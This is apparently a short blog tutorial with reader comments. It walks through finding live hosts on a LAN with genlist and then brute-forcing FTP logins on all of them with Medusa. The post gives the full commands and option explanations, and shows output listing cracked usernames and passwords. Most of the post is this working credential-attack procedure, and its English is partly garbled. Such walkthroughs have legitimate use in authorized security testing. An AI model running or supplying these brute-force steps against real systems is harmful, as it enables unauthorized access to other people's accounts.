This guide will show you how to perform a simple ftp or any other service that supports Medusa to check the weakness of the login data.
I will be using genlist to compile a list of the live hosts that are running on the network and have result in a txt file that Medusa can use to perform a brute force attack on all hosts live
I'll start with the path to find the range the network is using
code
mohamedx@kl:~# route -n |grep eth1
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 eth1
mohamedx@kl~#
In the above example on the network that I am connected to you are using the IP range 192.168.1.0 and the
default gateway 192.168.1.254, so I will analyze the whole netmask for hosts to live with genlist
Code
mohamedx@kl:~# genlist -s 192.168.1.\* > host_c-intruder3s
mohamedx@kl:~# cat host_c-intruder3s
192.168.1.67
192.168.1.68
192.168.1.69
192.168.1.77
192.168.1.78
192.168.1.101
192.168.1.254
mohamedx@kl:~#
Now I have obtained a list of live hosts I can go to use Medusa
Code:
medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp
- Medusa Options
Code:
-v level of detail six
H- Customer List
-U list Username
-P list Password
-M FTP module type, TELNET, SSH, HTTP, etc.
Note For this tutorial I will only use a small user / password List To save time
My output
mohamedx@kl: ~ # medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp | grep "ACCOUNT FOUND"
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: zerocold Password: password123 SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: offsec Password: password SUCCESS
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.68 User: michael Password: jhonadmin SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.77 User: rafael Password: admin123 SUCCESS
mohamedx@kl: ~ #
In the previous example I used | grep "account is found" to cut most of the output, so I only receive user names and passwords, but if I were to do this on the actual target it is not my home network i running normally so I can see to what extent the attack is on.
greetings // M.Ahmed
3 Responses
Hi What exactly Medusa is ?
darknet.org.uk/2006/05/medusa-password-cracker-version-11-now-available-for-download/ Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible
darknet.org.uk/2006/05/medusa-password-cracker-version-11-now-available-for-download/ Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible
Share Your Thoughts